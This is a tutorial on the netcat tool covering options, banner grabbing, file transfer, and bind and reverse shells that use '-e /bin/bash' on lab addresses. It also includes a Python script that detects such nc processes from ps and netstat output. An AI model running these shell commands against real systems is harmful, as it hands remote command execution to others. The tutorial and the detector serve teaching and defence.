Netcat: the TCP/IP connection tool (the "Swiss Army knife")
# nc -h
[v1.10-41.1]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
What nc can do
- telnet / grab a system's banner
- transfer text
- transfer files and directories
- transfer files with encryption
- port scanning
- remote control / bind and reverse shells
- streaming media server
- remote disk cloning
Connecting to a port
~# nc -v 192.168.124.21 22
192.168.124.21 [192.168.124.21] 22 (ssh) open
SSH-2.0-OpenSSH_7.9p1 Debian-10
# nc -lvp 1234
# netstat -utnlp | grep 1234
tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN 2240/nc
- -l: listen mode. -v: verbose output. -p: the local port number to listen on.
Bind shell
- netcat's command-serving (bind) mode lets any user who can reach the listening port execute arbitrary commands on the host
# nc -lvp 1234 -e /bin/bash
listening on [any] 1234 ...
connect to [192.168.124.21] from 192.168.124.21 [192.168.124.21] 49362
# nc 192.168.124.21 1234
whoami
root
ls
公共
模板
视频
图片
文档
Reverse shell
- In a reverse shell, the serving end connects out to a listening process that is ready to send it commands
# nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.124.21] from 192.168.124.21 [192.168.124.21] 49364
# nc 192.168.124.21 1234 -e /bin/bash
whoami
ls
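The help text above marks -e and -c as dangerous, so a defender wants to spot processes using them. The following Python script is an added example, not part of the original notes: it parses constructed `ps -eo pid,user,args` and `netstat -utnlp` output (same layout as the netstat line shown earlier) and flags nc processes that hand their connection to a program, labelling each as "bind" (-l given, or a listening socket owned by that pid) or "reverse". The process table and socket list are constructed samples, not captured from a real host.

```python
import shlex

# Constructed sample of `ps -eo pid,user,args` (not taken from the page).
PS_SAMPLE = """\
  PID USER     COMMAND
 2240 root     nc -lvp 1234 -e /bin/bash
 2251 alice    nc -v 192.168.124.21 22
 2262 bob      nc 192.168.124.21 1234 -e /bin/bash
"""
# Constructed sample of `netstat -utnlp`, same layout as the page's output.
NETSTAT_SAMPLE = """\
tcp        0      0 0.0.0.0:1234            0.0.0.0:*               LISTEN      2240/nc
udp        0      0 0.0.0.0:68              0.0.0.0:*                           700/dhclient
"""

def parse_ps(text):
    """Yield (pid, user, argv) for each ps line whose command is nc/netcat/ncat."""
    for line in text.splitlines()[1:]:          # skip the header row
        pid, user, cmd = line.split(None, 2)
        argv = shlex.split(cmd)
        if argv and argv[0].rsplit("/", 1)[-1] in ("nc", "netcat", "ncat"):
            yield int(pid), user, argv
def exec_program(argv):
    """Return the program handed to -e/-c (the options nc -h marks dangerous), else None."""
    for i, tok in enumerate(argv[1:], 1):
        if tok.startswith("-") and len(tok) > 1 and tok[-1] in "ec":
            return argv[i + 1] if i + 1 < len(argv) else "<missing>"
    return None
def listen_mode(argv):
    """True if -l appears, alone or combined as in -lvp."""
    return any(t.startswith("-") and "l" in t[1:] for t in argv[1:])
def listeners(text):
    """Map pid -> local sockets parsed from netstat -utnlp output (tcp and udp rows)."""
    socks = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 6 and f[0][:3] in ("tcp", "udp") and "/" in f[-1]:
            socks.setdefault(int(f[-1].split("/")[0]), []).append(f[3])
    return socks
def find_exec_shells(ps_text=PS_SAMPLE, netstat_text=NETSTAT_SAMPLE):
    """Flag nc processes that hand their connection to a program via -e/-c."""
    socks, findings = listeners(netstat_text), []
    for pid, user, argv in parse_ps(ps_text):
        prog = exec_program(argv)
        if prog is None:
            continue                             # plain client or listener: not flagged
        mode = "bind" if listen_mode(argv) or pid in socks else "reverse"
        findings.append({"pid": pid, "user": user, "mode": mode,
                         "program": prog, "listening_on": socks.get(pid, [])})
    return findings
```

Run it against real `ps -eo pid,user,args` and `netstat -utnlp` output on a host to get the same findings list; the plain `nc -v host 22` banner grab is deliberately not flagged.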
Redirecting output
- Use shell redirection ("<" and ">") to have Netcat write what it receives to a file
# nc -lvp 1234 > netcatfile
# nc 192.168.124.21 1234 < myfile